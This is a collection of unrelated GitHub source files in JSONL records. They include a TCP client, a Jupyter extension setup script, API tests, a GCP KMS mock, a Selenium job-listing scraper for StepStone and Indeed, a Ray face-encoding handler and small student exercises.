serializers.ImageField(required=False)\n nickname = serializers.CharField(max_length=50, required=False)\n class Meta:\n model = User\n fields = ['nickname', 'profile_image', 'latitude', 'longitude', 'address']","repo_name":"YongjoonSeo/Children-ZIP","sub_path":"backend/accounts/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9169732865","text":"import socket\nimport argparse\n\ndef tcp_client(host, port):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n data = s.recv(100)\n file = open(\"file2.txt\", 'wb')\n file.write(data)\n\ndef valid_port(port):\n port = int(port)\n if port < 1024 or port >= 64000:\n raise argparse.ArgumentError()\n return port\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"host\")\n parser.add_argument(\"port\", type=valid_port)\n args = parser.parse_args()\n tcp_client(args.host, 
args.port)\n","repo_name":"JamesSunshine/TCP_Server","sub_path":"tcp_client.py","file_name":"tcp_client.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10614843827","text":"\"\"\"\nwebio_jupyter_extension setup\n\"\"\"\nimport json\nimport sys\nfrom pathlib import Path\n\nimport setuptools\n\nHERE = Path(__file__).parent.resolve()\n\n# The name of the project\nname = \"webio_jupyter_extension\"\n\nlab_path = (HERE / name.replace(\"-\", \"_\") / \"labextension\")\nnbextension_path = (HERE / name.replace(\"-\", \"_\") / \"nbextension\")\n\n# Representative files that should exist after a successful build\nensured_targets = [\n str(lab_path / \"package.json\"),\n str(lab_path / \"static/style.js\")\n]\n\n# Get the package info from package.json\npkg_json = json.loads((HERE / \"package.json\").read_bytes())\nlabext_name = pkg_json[\"name\"]\n\ndata_files_spec = [\n # labextension files\n (f\"share/jupyter/labextensions/{labext_name}\", str(\".\"), \"install.json\"),\n (f\"share/jupyter/labextensions/{labext_name}\", str(lab_path.relative_to(HERE)), \"**\"),\n\n # nbextension files\n ('share/jupyter/nbextensions/webio-jupyter-nbextension', str(nbextension_path.relative_to(HERE)), '**'),\n ('etc/jupyter/nbconfig/notebook.d' , \"jupyter-config/notebook-config\", 'webio-jupyter-nbextension.json'),\n\n # serverextension files\n (\"etc/jupyter/jupyter_server_config.d\", \"jupyter-config/server-config\", f\"{name}.json\"),\n # For backward compatibility with notebook server\n (\"etc/jupyter/jupyter_notebook_config.d\", \"jupyter-config/nb-config\", f\"{name}.json\"),\n]\n\nlong_description = (HERE / \"README.md\").read_text()\n\n\nsetup_args = dict(\n name=name,\n version=pkg_json[\"version\"],\n description=pkg_json[\"description\"],\n license=pkg_json[\"license\"],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=setuptools.find_packages(),\n install_requires=[],\n zip_safe=False,\n include_package_data=True,\n python_requires=\">=3.6\",\n platforms=\"Linux, Mac OS X, Windows\",\n keywords=[\"Jupyter\", \"JupyterLab\", \"JupyterLab3\"],\n classifiers=[\n \"License :: OSI Approved :: BSD License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Framework :: Jupyter\",\n \"Framework :: Jupyter :: JupyterLab\",\n \"Framework :: Jupyter :: JupyterLab :: 3\",\n \"Framework :: Jupyter :: JupyterLab :: Extensions\",\n \"Framework :: Jupyter :: JupyterLab :: Extensions :: Prebuilt\",\n ],\n)\n\ntry:\n from jupyter_packaging import (\n wrap_installers,\n npm_builder,\n get_data_files\n )\n post_develop = npm_builder(\n build_cmd=\"install:extension\", source_dir=\"src\", build_dir=lab_path\n )\n setup_args[\"cmdclass\"] = wrap_installers(post_develop=post_develop, ensured_targets=ensured_targets)\n setup_args[\"data_files\"] = get_data_files(data_files_spec)\nexcept ImportError as e:\n import logging\n logging.basicConfig(format=\"%(levelname)s: %(message)s\")\n logging.warning(\"Build tool `jupyter-packaging` is missing. 
Install it with pip or conda.\")\n if not (\"--name\" in sys.argv or \"--version\" in sys.argv):\n raise e\n\nif __name__ == \"__main__\":\n setuptools.setup(**setup_args)\n","repo_name":"JuliaGizmos/WebIO.jl","sub_path":"webio_jupyter_extension/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"66"} +{"seq_id":"33545097922","text":"# pylint: disable=redefined-outer-name\nimport pytest\n\nfrom partner_offers import geosearch_parsing\n\n\n@pytest.fixture\ndef search_org_mock_success(patch):\n @patch('partner_offers.geosearch_parsing.search_organization')\n async def _search_organization(\n business_oid: int, lang: str, *args, **kwargs,\n ):\n return (\n geosearch_parsing.OrganizationData(\n name='Магнит',\n logo_uri='https://avatars.mds.yandex.net/get-altay/1881734/2a0000016a35aba90cfe1b24c59b99f31939/M', # noqa: E501,\n chain_id=None,\n ),\n geosearch_parsing.LocationData(\n name='Магнит',\n business_oid=business_oid,\n longitude=50.0,\n latitude=30.0,\n work_times=[],\n timezone_offset=3600,\n country='Россия',\n city='Кукуево',\n formatted_address='Россия, с. Кукуево, ул. Ильича, д. Лампочка', # noqa: E501\n logo_uri='https://avatars.mds.yandex.net/get-altay/1881734/2a0000016a35aba90cfe1b24c59b99f31939/M', # noqa: E501\n chain=None,\n ),\n )\n\n return _search_organization\n\n\n@pytest.fixture\ndef search_org_mock_not_found(patch):\n @patch('partner_offers.geosearch_parsing.search_organization')\n async def _search_organization(*args, **kwargs):\n return None\n\n return _search_organization\n\n\nasync def test_search_organizations(web_app_client, search_org_mock_success):\n business_oid = 1255966696\n uri = f'/internal/v1/organizations/list?business_oid={business_oid}'\n response = await web_app_client.post(uri)\n assert response.status == 200, await response.text()\n content = await response.json()\n expected = {\n 'organizations': [\n {\n 'business_oid': str(business_oid),\n 'logo': 'https://avatars.mds.yandex.net/get-altay/1881734/2a0000016a35aba90cfe1b24c59b99f31939/M', # noqa: E501\n 'name': 'Магнит',\n },\n ],\n }\n assert content == expected\n\n\n@pytest.mark.pgsql('partner_offers', files=['pg_static_data.sql'])\nasync def test_already_has(web_app_client, mockserver):\n # pylint: disable=unused-variable\n\n @mockserver.json_handler('/geocoder/yandsearch')\n def get_by_business_oid(_):\n assert False, 'Must not be called'\n\n business_oid = 123456\n uri = f'/internal/v1/organizations/list?business_oid={business_oid}'\n response = await web_app_client.post(uri)\n assert response.status == 409, await response.text()\n response_json = await response.json()\n del response_json['id']\n expected = {\n 'name': 'Big zombie shop',\n 'logo': 'https://example.com/image.jpg',\n 'deals_related': {'category': 'food', 'comment': 'Some comment text'},\n 'locations': [\n {\n 'name': 'Russia, Moscow',\n 'locations': [\n {\n 'address': 'Москва, Лубянка, 5',\n 'name': 'Big zombie shop',\n 'id': str(business_oid),\n 'map_link': f'https://yandex.ru/maps/?mode=search&ol=biz&oid={business_oid}', # noqa: E501\n },\n ],\n },\n ],\n 'changelog': {\n 'updated_by': 'valery',\n 'updated_at': '2019-05-26T19:10:25+03:00',\n 'created_by': 'valery',\n 'created_at': '2019-05-26T19:10:25+03:00',\n },\n }\n assert response_json == expected\n\n\nasync def test_search_organizations_not_found(\n web_app_client, search_org_mock_not_found,\n):\n business_oid = 123456\n uri = 
f'/internal/v1/organizations/list?business_oid={business_oid}'\n response = await web_app_client.post(uri)\n assert response.status == 404, await response.text()\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_partner_offers/web/test_search_organizations.py","file_name":"test_search_organizations.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29585148853","text":"\"\"\"\nA mock version of module :mod:`.gcp_kms`.\n\nThe code in this module does not make any external requests.\n\n\"\"\"\nimport base64\nimport uuid\n\nimport cryptography.fernet\n\nfrom .gcp_kms import GcpCredentials, GcpResource # noqa: F401\nfrom .gcp_kms import ( # noqa: F401\n compose_crypto_key_grn,\n compose_crypto_key_version_grn,\n compose_key_ring_grn,\n compose_location_grn,\n compose_project_grn,\n)\nfrom .gcp_kms import ( # noqa: F401\n KMS_LOCATION_ID_MAX_LENGTH_ESTIMATION,\n KMS_KEY_RING_ID_MAX_LENGTH,\n KMS_KEY_RING_ID_REGEX,\n KMS_CRYPTO_KEY_ID_MAX_LENGTH,\n KMS_CRYPTO_KEY_ID_REGEX,\n KMS_ENCRYPTION_PLAIN_DATA_MAX_SIZE,\n)\n\n\n###############################################################################\n# KMS API operations - crypto key\n###############################################################################\n\ndef create_crypto_key(\n api_client: object,\n key_ring_grn: str,\n crypto_key_id: str = None,\n) -> str:\n \"\"\"\n Create a crypto key (mock) within a key ring.\n\n Useful for mocking :func:`.gcp_kms.create_crypto_key`.\n\n :return: crypto key GRN\n\n \"\"\"\n # TODO: see TODOs in '.gcp_kms.create_crypto_key'\n\n crypto_key_id = crypto_key_id or uuid.uuid4().hex\n crypto_key_grn = '{}/cryptoKeys/{}'.format(\n key_ring_grn,\n crypto_key_id,\n )\n\n return crypto_key_grn\n\n\ndef encrypt(\n api_client: object,\n crypto_key_grn: str,\n plain_data: bytes,\n) -> bytes:\n \"\"\"\n Encrypt binary ``plain_data`` locally, without using GCP KMS.\n\n Useful for mocking :func:`.gcp_kms.encrypt`.\n\n \"\"\"\n if not isinstance(plain_data, bytes):\n raise TypeError(\"Type of 'plain_data' is not bytes.\")\n if len(plain_data) > KMS_ENCRYPTION_PLAIN_DATA_MAX_SIZE:\n raise ValueError(\"Size of 'plain_data' exceeds max size.\")\n\n fernet_key_input = crypto_key_grn[-32:].encode(encoding='ascii')\n fernet_key = _generate_fernet_key(fernet_key_input)\n\n f = cryptography.fernet.Fernet(fernet_key)\n encrypted_data: bytes = f.encrypt(plain_data)\n\n return encrypted_data\n\n\ndef decrypt(\n api_client: object,\n crypto_key_grn: str,\n encrypted_data: bytes,\n) -> bytes:\n \"\"\"\n Decrypt binary ``encrypted_data``locally, without using GCP KMS.\n\n Useful for mocking :func:`.gcp_kms.decrypt`.\n\n \"\"\"\n fernet_key_input = crypto_key_grn[-32:].encode(encoding='ascii')\n fernet_key = _generate_fernet_key(fernet_key_input)\n\n f = cryptography.fernet.Fernet(fernet_key)\n plain_data: bytes = f.decrypt(encrypted_data)\n\n return plain_data\n\n\n###############################################################################\n# internal helpers\n###############################################################################\n\ndef _generate_fernet_key(value: bytes) -> bytes:\n # Based on 'cryptography.fernet.Fernet.generate_key'.\n if not isinstance(value, bytes):\n raise TypeError\n if len(value) != 32:\n raise ValueError\n return 
base64.urlsafe_b64encode(value)\n","repo_name":"fyntex/gcp-utils-python","sub_path":"fd_gcp/gcp_kms_mock.py","file_name":"gcp_kms_mock.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"27054160203","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup as bs4\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\nimport getpass\nimport easygui as eg\nfrom tqdm import tqdm\n\n\n# In[2]:\n\n\ndef click(x):\n button = driver.find_element(By.XPATH, x)\n button.click()\n time.sleep(2)\n\n\n# ### scraping from stepstone\n\n# scraping from stepstone.de to get page source of the job results pages (page 1, page 2, page 3, etc.)\n\n# In[3]:\n\n\ndef scrape_pages(url):\n search_result = []\n options = Options()\n options.add_argument('--disable-gpu')\n options.add_argument('user-agent=fake-useragent')\n driver.get(url)\n time.sleep(6)\n ok1 = \"/html/body/div[10]/section/div/section/div[2]/div[1]/div[2]/div\"\n ok2 = \"/html/body/div[9]/section/div/section/div[2]/div[1]/div[2]/div\"\n ok3 = \"/html/body/div[10]/section/div/section/div[2]/div[1]/div[2]\"\n try:\n click(ok1)\n except:\n pass\n try:\n click(ok2)\n except:\n pass\n try:\n click(ok3)\n except:\n pass\n npage = \"/html/body/div[4]/div[1]/div/div/div[2]/div/div[2]/div[3]/div/nav/ul/li[9]/a\"\n html = driver.page_source\n a = 0\n while a<20:\n search_result.append(html)\n time.sleep(1)\n i = 0\n while i < 4:\n driver.execute_script(\"window.scrollTo(0, window.scrollY + 1500)\") \n time.sleep(.2)\n i+=1\n time.sleep(4)\n click(npage)\n html = driver.page_source\n a += 1\n return search_result\n\n\n# In[4]:\n\n\nsearch_result_1 = []\n\n\n# In[5]:\n\n\nurls = [\"https://www.stepstone.de/jobs/python-data-analyst\",\"https://www.stepstone.de/jobs/sql-data-analyst\",\"https://www.stepstone.de/jobs/tableau-data-analyst\",\"https://www.stepstone.de/jobs/tableau-business-intelligence\"]\n\n\n# In[11]:\n\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\nsearch_result_1.extend(scrape_pages(urls[3]))\n\n\n# In[12]:\n\n\njob_url_1 = []\nfor h in tqdm(search_result_1):\n soup = bs4(h)\n res = soup.find_all(\"article\",{\"class\":\"resultlist-1jx3vjx\"})\n for r in res:\n href = r.find(\"a\",{\"class\":\"resultlist-1uvdp0v\"}).get(\"href\")\n href = \"https://www.stepstone.de\"+href\n job_url_1.append(href)\ndf_1 = pd.DataFrame(columns = [\"job_url\"])\ndf_1[\"job_url\"] = job_url_1\n\n\n# In[13]:\n\n\ndf_1 = df_1.drop_duplicates(subset = \"job_url\").reset_index(drop = True)\n\n\n# In[14]:\n\n\n# df_1.to_csv(\"job url 1.csv\", index = False)\n\n\n# In[15]:\n\n\n# df_1 = pd.read_csv(\"job url 1.csv\")\n\n\n# In[20]:\n\n\ndef get_page_source(df_url):\n source = []\n job_url = df_url[\"job_url\"].tolist()\n options = Options()\n # installing chromedriver, so that we dont need to keep the chromedriver file\n # that needs to be updated every once in a while. 
better install the latest automatically\n driver = webdriver.Chrome(ChromeDriverManager().install())\n for i in job_url: # get full page source for each job offer page\n # options.add_argument(\"--disable-notifications\")\n # to prevent from being spotted as a robot\n options.add_argument('--disable-gpu')\n options.add_argument('user-agent=fake-useragent')\n # opens the browser, maximize window size\n # opening url\n driver.get(i)\n time.sleep(3.5)\n page = driver.page_source\n source.append(page)\n # saving source column separately for each splitted file\n job_source = pd.DataFrame(columns = [\"job_source\"])\n job_source[\"job_source\"] = source\n filename = \"job source 1.csv\"\n job_source.to_csv(filename, index = False)\n return job_source\n\n\n# In[21]:\n\n\nsource = get_page_source(df_1)\n\n\n# getting some details from each page source we had from the big scraping job (see cell above)\n\n# In[51]:\n\n\ndf_stepstone = pd.DataFrame()\nurl_1,d_1,t_1,cn_1,cl_1,c_1= [],[],[],[],[],[]\n\ndf1 = df_1.copy()\ndf2 = source.copy()\ndescription_1,title_1,comp_name_1,comp_url_1,city_1 = [],[],[],[],[]\nsource = df2[\"job_source\"].tolist()\nfor s in source:\n soup = bs4(s, \"html.parser\")\n try:\n jobtitle = soup.find(\"span\",{\"data-at\":\"header-job-title\"}).text\n except:\n jobtitle = \"unknown\"\n title_1.append(jobtitle)\n try:\n compname = soup.find(\"a\",{\"data-at\":\"header-company-name\"}).text\n except:\n compname = \"unknown\"\n comp_name_1.append(compname)\n try:\n complink = soup.find(\"a\",{\"data-at\":\"header-company-name\"}).get(\"href\")\n except:\n complink = \"unknown\"\n comp_url_1.append(complink)\n try:\n city = soup.find(\"span\",{\"class\":\"listing-content-provider-1u79rpn\"}).text\n except:\n city = \"unknown\"\n city_1.append(city)\n infotext = soup.find_all(\"div\",{\"class\":\"listing-content-provider-10ltcrf\"})\n desc = []\n for i in infotext:\n try:\n texts = i.find_all(\"p\")\n for t in texts:\n info = t.text\n desc.append(info)\n except:\n pass\n try:\n texts = i.find_all(\"li\")\n for t in texts:\n info = t.text\n desc.append(info)\n except:\n pass\n # enemy spotted\n description = \" \".join(desc).replace(\"\\xa0\",\"\").replace(\"\\\\n\",\"\")\n description_1.append(description)\nd_1.extend(description_1)\nt_1.extend(title_1)\ncn_1.extend(comp_name_1)\ncl_1.extend(comp_url_1)\nc_1.extend(city_1)\nurl_1.extend(df1[\"job_url\"].tolist())\n\n\n# In[53]:\n\n\ndf_stepstone[\"job_url\"] = url_1\ndf_stepstone[\"description\"] = d_1\ndf_stepstone[\"job_title\"] = t_1\ndf_stepstone[\"comp_name\"] = cn_1\ndf_stepstone[\"comp_link\"] = cl_1\ndf_stepstone[\"city\"] = c_1\n\n\n# In[57]:\n\n\ndf_stepstone = df_stepstone[df_stepstone[\"description\"] != \"\"]\n\n\n# In[58]:\n\n\nimport numpy as np\n\n\n# In[60]:\n\n\ndf_stepstone.to_csv(\"stepstone 1 incomplete.csv\", index = False)\n\n\n# ### now scrape from indeed.com\n\n# In[3]:\n\n\nfrom selenium.webdriver.common.keys import Keys\n\n\n# In[14]:\n\n\ndef scrape_indeed(key): \n url2 = \"https://de.indeed.com/?r=us\"\n options = Options()\n # options.add_argument(\"--disable-notifications\")\n # to prevent from being spotted as a robot\n options.add_argument('--disable-gpu')\n options.add_argument('user-agent=fake-useragent')\n # opening url\n driver.get(url2)\n time.sleep(2)\n search_xpath = \"/html/body/div[1]/div[1]/div/span/div[4]/div[2]/div/div/div/div/form/div/div[1]/div/div[1]/div/div[2]/input\"\n search = driver.find_element(By.XPATH,search_xpath)\n\n search.send_keys(key)\n findjob_xpath = 
\"/html/body/div[1]/div[1]/div/span/div[4]/div[2]/div/div/div/div/form/button\"\n click(findjob_xpath)\n\n html = driver.page_source\n npage = \"/html/body/main/div/div[1]/div/div/div[5]/div[1]/nav/div[6]/a\"\n lhtml2 = []\n counter = 1\n a = 0\n while a < 30:\n if counter == 2:\n time.sleep(2)\n webdriver.ActionChains(driver).send_keys(Keys.ESCAPE).perform()\n lhtml2.append(html)\n time.sleep(1)\n i = 0\n while i < 4:\n driver.execute_script(\"window.scrollTo(0, window.scrollY + 1500)\") \n time.sleep(.2)\n i+=1\n time.sleep(1)\n try:\n click(npage)\n except:\n a = 30\n counter += 1\n html = driver.page_source\n # comparing html_before and html_after\n a += 1\n return lhtml2\n\n\n# In[15]:\n\n\nkeys = [\"sql data analyst\",\"python data analyst\",\"tableau data analyst\",\"tableau business intelligence\"]\ndriver = webdriver.Chrome(ChromeDriverManager().install())\nlhtml2 = []\nfor key in keys:\n lhtml2.extend(scrape_indeed(key))\n\n\n# In[16]:\n\n\nlhref2 = []\nfor h in tqdm(lhtml2):\n soup = bs4(h)\n container = soup.find(\"ul\",{\"class\":\"jobsearch-ResultsList css-0\"})\n res = container.find_all(\"div\",{\"class\":\"slider_container css-g7s71f eu4oa1w0\"})\n for r in res:\n href = r.find(\"h2\",{\"tabindex\":\"-1\"}).find(\"a\").get(\"href\")\n href = \"https://de.indeed.com\" + href\n lhref2.append(href)\nhref_pd2 = pd.DataFrame(columns = [\"job_url\"])\nhref_pd2[\"job_url\"] = lhref2\n\n\n# In[20]:\n\n\nsource2 = []\noptions = Options()\n# installing chromedriver, so that we dont need to keep the chromedriver file\n# that needs to be updated every once in a while. better install the latest automatically\ndriver = webdriver.Chrome(ChromeDriverManager().install())\nfor i in tqdm(lhref2):\n # options.add_argument(\"--disable-notifications\")\n # to prevent from being spotted as a robot\n options.add_argument('--disable-gpu')\n options.add_argument('user-agent=fake-useragent')\n # opening url\n driver.get(i)\n time.sleep(3)\n page = driver.page_source\n source2.append(page)\nhref_pd2[\"job_source\"] = source2\n\n\n# In[21]:\n\n\n\n\n\n# In[22]:\n\n\nldescription2,ltitle2,lcompname2,lcomplink2,lcity2 = [],[],[],[],[]\n\nfor s in tqdm(source2):\n soup = bs4(s, \"html.parser\")\n try:\n jobtitle = soup.find(\"h1\",{\"class\":\"icl-u-xs-mb--xs icl-u-xs-mt--none jobsearch-JobInfoHeader-title\"}).text\n except:\n jobtitle = None\n ltitle2.append(jobtitle)\n try:\n compname = soup.find(\"div\",{\"data-company-name\":\"true\"}).text\n except:\n compname = None\n lcompname2.append(compname)\n try:\n complink = soup.find(\"div\",{\"data-company-name\":\"true\"}).find(\"a\").get(\"href\")\n except:\n complink = None\n lcomplink2.append(complink)\n city = None\n lcity2.append(city)\n infotext = soup.find(\"div\",{\"id\":\"jobDescriptionText\"}).find_all(\"p\")\n desc = []\n for i in infotext:\n try:\n texts = i.find(\"b\").text\n desc.append(texts)\n except:\n texts = i.text\n desc.append(texts)\n # enemy spotted\n description = \" \".join(desc)\n ldescription2.append(description)\n\n\n# In[23]:\n\n\nhref_pd2[\"description\"] = ldescription2\nhref_pd2[\"job_title\"] = ltitle2\nhref_pd2[\"comp_name\"] = lcompname2\nhref_pd2[\"comp_link\"] = lcomplink2\nhref_pd2[\"city\"] = lcity2\nhref_pd2.to_csv(\"indeed 1 incomplete.csv\", index = False)\n\n\n# In[24]:\n\n\nhref_pd2 = pd.read_csv(\"indeed 1 incomplete.csv\")\n\n\n# In[27]:\n\n\nhref_pd = pd.read_csv(\"stepstone 1 incomplete.csv\")\n\n\n# In[36]:\n\n\nfull = pd.concat([href_pd, href_pd2], axis = 0)\n\n\n# In[37]:\n\n\nfull = 
full[full[\"description\"] != \"\"]\nfull = full.drop(columns = [\"job_source\"])\n\n\n# In[38]:\n\n\nfull.to_csv(\"full.csv\", index = False)\ndf = full.copy()\n\n\n# In[ ]:\n\n\ndf = df.dropna(subset = [\"comp_link\"])\n\n\n# In[ ]:\n\n\nquerying = [\"data\",\"analy\",\"analy\",\"sql\",\"sql\",\"sql\",\"big data\",\"query\",\"entry\",\"base\",\"warehouse\"] #A\nengineering = [\"python\",\"python\",\"data\",\"analy\",\"analy\",\"machine\",\"learn\",\"etl\",\"oop\",\"pipe\",\"pipe\",\"tensor\",\"engineer\",\"nlp\"] #B\nanalysis = [\"python\",\"python\",\"python\",\"data\",\"analy\",\"analy\",\"eda\",\"predict\",\"machine\",\"learn\",\"test\",\"explor\",\"statisti\"] #C\nmodel_building = [\"python\",\"python\",\"data\",\"analy\",\"analy\",\"machine\",\"machine\",\"learn\",\"predict\",\"ml\",\"model\",\"model\",\"train\"] #D\nscraping = [\"python\",\"python\",\"python\",\"data\",\"analy\",\"analy\",\"clean\",\"mining\",\"scrap\",\"csv\",\"json\",\"api\"] #E\ndashboarding = [\"bi\",\"bi\",\"power\",\"data\",\"analy\",\"analy\",\"dashboard\",\"tableau\",\"tableau\",\"tableau\",\"report\",\"visuali\"] #F\ncategory = [querying, engineering, analysis, model_building, scraping, dashboarding]\n\n\n# In[ ]:\n\n\nA,B,C,D,E,F = [],[],[],[],[],[]\n\nscores = [A,B,C,D,E,F]\ndescription = df.description.tolist()\nfor des in tqdm(description):\n for score, cat in list(zip(scores, category)):\n sc = []\n for i in cat:\n if i in str(des).lower():\n sc.append(1)\n # else:\n # sc.append(0)\n n = len(sc)/len(cat)*100\n score.append(round(n,2)) \n\n\n# In[ ]:\n\n\ndf[\"querying\"] = A\ndf[\"engineering\"] = B\ndf[\"analysis\"] = C\ndf[\"model_building\"] = D\ndf[\"scraping\"] = E\ndf[\"dashboarding\"] = F\ndf = df.fillna(\"unknown\")\n\n\n# In[ ]:\n\n\ncity = []\nfor i in df[\"city\"]:\n if \",\" in i:\n i= \"multiple cities\"\n city.append(i)\n else:\n city.append(i)\ndf[\"city\"] = city\n\n\n# In[ ]:\n\n\nX = df.drop(columns=[\"job_url\",\"description\",\"comp_link\"])\ndf.to_csv(\"data clean with url.csv\", index = False)\nX.to_csv(\"data clean.csv\", index = False)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"mdimasaac/data-analyst-job-search-assistant","sub_path":"updating_database.py","file_name":"updating_database.py","file_ext":"py","file_size_in_byte":12332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18064661784","text":"# Keys from the archive\nNAME_KEY = \"pl_name\"\nPER_KEY = \"pl_orbper\"\nTP_KEY = \"pl_orbtper\"\nTC_KEY = \"pl_tranmid\"\nECC_KEY = \"pl_orbeccen\"\nOMEGA_KEY = \"pl_orblper\"\nK_KEY = \"pl_rvamp\"\nTRANSIT_FLAG = \"tran_flag\"\n\n# Keys used to model orbit\nORB_KEYS = [PER_KEY, TP_KEY, ECC_KEY, OMEGA_KEY, K_KEY]\nORB_KEYS_REFS = [ok + \"_reflink\" for ok in ORB_KEYS]\nORB_KEYS_ERRS = [ok + ek for ok in ORB_KEYS for ek in (\"err1\", \"err2\")]\n\nCONTROV_FLAG = \"pl_controv_flag\"\n","repo_name":"vandalt/ephemere","sub_path":"ephemere/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22478179613","text":"import time\nimport os\nimport numpy as np\nimport face_recognition\nfrom veriff.data.context import Context\nfrom veriff.handler import AbstractHandler\nfrom veriff.helper.logger_util import get_logger\nimport ray\nfrom veriff.consts import RUNNING_MODE_ENV, HEAD_SERVICE_IP_ENV, 
HEAD_SERVICE_CLIENT_PORT_ENV\n\n\nlogger = get_logger(__name__)\n\n\n@ray.remote\ndef face_encodings(image_path):\n image_data = face_recognition.load_image_file(image_path)\n\n face_vectors = face_recognition.face_encodings(image_data)\n if not face_vectors:\n logger.warning(\"face encodings failed. vector not found for image %r\", image_path)\n # return empty array\n return np.empty((128,), dtype=int)\n\n return face_vectors[0]\n\n\nclass FaceVectorCalculatorHandler(AbstractHandler):\n \"\"\"\n FaceVectorCalculatorHandler is used to calculate average face vector\n \"\"\"\n def handle(self, context: Context):\n start_time = time.time()\n logger.info(\"face-vector calculator start\")\n\n face_images_data_list = context.data_set\n\n # ray init\n running_mode = os.getenv(RUNNING_MODE_ENV, 'local')\n if running_mode == 'local':\n ray.init()\n else:\n # Kubernetes inject ip address of ray cluster head service into head_svc env variable\n head_service_ip = os.environ[os.environ[HEAD_SERVICE_IP_ENV]]\n client_port = os.environ[os.environ[HEAD_SERVICE_CLIENT_PORT_ENV]]\n ray.util.connect(f\"{head_service_ip}:{client_port}\")\n logger.info(\"ray init done\")\n\n refs = [face_encodings.remote(image_path) for image_path in face_images_data_list]\n face_vectors = ray.get(refs)\n logger.info(\"face-encoding jobs completed\")\n\n # average operation on vectors\n context.result = np.mean(face_vectors, axis=0)\n logger.info(\"face-vector calculator completed. took %r seconds\", (time.time() - start_time))\n self.next.handle(context)\n\n","repo_name":"quebic-source/veriff-assessment","sub_path":"veriff/handler/execution_handler.py","file_name":"execution_handler.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73759408210","text":"# 3. 도시별 최근 3일의 온도입니다.\ncity = {\n '서울': [-6, -10, 5],\n '대전': [-3, -5, 2],\n '광주': [0, -2, 10],\n '부산': [2, -2, 9],\n}\n# 3-2. 
도시 중에 최근 3일 중에 가장 추웠던 곳, 가장 더웠던 곳은?\nmintem = 100\nmaxtem = -100\nmaxcit = \"\"\nmincit = \"\"\nfor cit in city.keys() : \n for tem in city[cit]:\n if tem > maxtem :\n maxcit = cit\n maxtem = tem\n if tem < mintem :\n mincit = cit\n mintem = tem\n \n# 아래에 코드를 작성해 주세요.\nprint(f'최근 3일중 가장 온도가 높았던 지역은 {maxcit}에서 {maxtem}도 이였고, 가장 온도가 낮았던 지역은 {mincit}에서 {mintem}도 였습니다.')","repo_name":"airpong/TIL","sub_path":"startcamp/day04/quizz/quizz3-2.py","file_name":"quizz3-2.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12696984531","text":"import numpy as np\nimport cv2\n\ndef constructIntrinsicMatrix(frameResolution, sensorHeight, focalLength):\n \"\"\"\n @param frameResolution: (width, height) in pixels\n @param sensorWidth: width of the sensor in mm\n @param sensorHeight: height of the sensor in mm\n @param focalLength: focal length of the lens in mm\n \"\"\"\n aspectRatio = frameResolution[0] / frameResolution[1]\n fx = focalLength * frameResolution[0] / (sensorHeight * aspectRatio)\n fy = focalLength * frameResolution[1] / sensorHeight\n cx = frameResolution[0] / 2\n cy = frameResolution[1] / 2\n return np.matrix([[fx, 0, cx], [0, fy, cy], [0, 0, 1]])\n\ndef computeProjectionMatrix(camera, worldObject):\n \"\"\"\n @param camera: Camera object\n @param worldObject: WorldObject object\n \"\"\"\n # Get the rotation matrix\n rotation = np.matrix([[np.cos(worldObject.rotation[0]), -np.sin(worldObject.rotation[0]), 0],\n [np.sin(worldObject.rotation[0]), np.cos(worldObject.rotation[0]), 0],\n [0, 0, 1]])\n # Get the translation matrix\n translation = np.matrix([[1, 0, 0, -worldObject.location[0]],\n [0, 1, 0, -worldObject.location[1]],\n [0, 0, 1, -worldObject.location[2]],\n [0, 0, 0, 1]])\n # Get the extrinsic matrix\n extrinsic = rotation * translation\n # Get the intrinsic matrix\n intrinsic = constructIntrinsicMatrix(camera.resolution, camera.sensorHeight, camera.focalLength)\n # Get the projection matrix\n projection = intrinsic * extrinsic\n return projection\n\n\n\ncv2.createCameraMatrix(27)","repo_name":"rems64/Tracker","sub_path":"playground2.py","file_name":"playground2.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31604714770","text":"from dila2sql.utils import connect_db\nfrom tqdm import tqdm\nfrom 